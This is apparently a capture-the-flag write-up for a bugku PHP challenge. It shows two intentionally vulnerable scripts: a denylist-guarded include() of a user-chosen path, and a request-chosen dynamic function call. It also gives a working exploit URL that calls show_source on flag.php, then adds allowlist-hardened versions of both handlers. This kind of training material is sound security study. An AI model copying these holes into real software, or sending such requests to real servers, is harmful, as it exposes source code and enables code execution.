bugku command-injection

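Following the hints, open the two PHP files.
Note: when using the pseudo-protocol (stream wrapper) here, the trailing resource= value must not include the .php suffix, because the script appends '.php' itself before calling include().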

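<?php
// include.php
error_reporting(0);
@$file = $_GET["file"];
if(isset($file)) {
	// Denylist check: a few wrapper names, "%00", "flag", "..", and a length limit
	if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) {
		echo "<p> error! </p>";
	} else {
		// ".php" is appended to the user-supplied value before include()
		include($file.'.php');
		setcookie("tips","createfun.php");
	}
} else {
	header('Location:include.php?file=index');
}
?>

<?php
// createfun.php
$func = @$_GET['func'];
$arg = @$_GET['arg'];
// The request chooses both the function name and its first argument
if(isset($func)&&isset($arg)){$func($arg,'');}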

Here, show_source is passed as the function with flag.php as its argument:

http://82.157.146.43:11891/createfun.php?func=show_source&arg=flag.php

This returns the flag.
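Both scripts fail for the same reason: the request decides what gets included or called, and a denylist cannot enumerate every dangerous value. The following is an added example, not part of the challenge or the original post, showing allowlist versions of both handlers; the page names, file layout and handler names are assumptions.

```php
<?php
// Added example (not from the challenge): hardened versions of the two
// handlers. Page names, paths and allowed handlers below are assumptions.
declare(strict_types=1);

// include.php: map the request value to a fixed file instead of building a path.
const PAGES = [
    'index' => __DIR__ . '/pages/index.php',   // hypothetical layout
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_page(?string $name): ?string
{
    // Exact key match only: wrappers, traversal and suffix tricks never match.
    return ($name !== null && array_key_exists($name, PAGES)) ? PAGES[$name] : null;
}

// createfun.php: dispatch through a fixed table of closures, never $func($arg).
function handlers(): array
{
    return [
        'upper'  => static fn (string $arg): string => strtoupper($arg),
        'length' => static fn (string $arg): string => (string) strlen($arg),
    ];
}

function dispatch(?string $func, ?string $arg): ?string
{
    $table = handlers();
    if ($func === null || $arg === null || !isset($table[$func])) {
        return null; // unknown name: reject, do not fall back to a PHP function
    }
    return $table[$func]($arg);
}

// Constructed sample inputs, shaped like the requests in the write-up.
$checks = [
    ['page', 'php://filter/resource=index', null],
    ['page', 'index', null],
    ['func', 'show_source', 'flag.php'],
    ['func', 'upper', 'hello'],
];
foreach ($checks as $c) {
    $out = $c[0] === 'page' ? resolve_page($c[1]) : dispatch($c[1], $c[2]);
    printf("%-5s %-30s => %s\n", $c[0], $c[1], $out === null ? 'rejected' : 'allowed');
}
```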

posted @ 2023-09-19 13:24  N0zoM1z0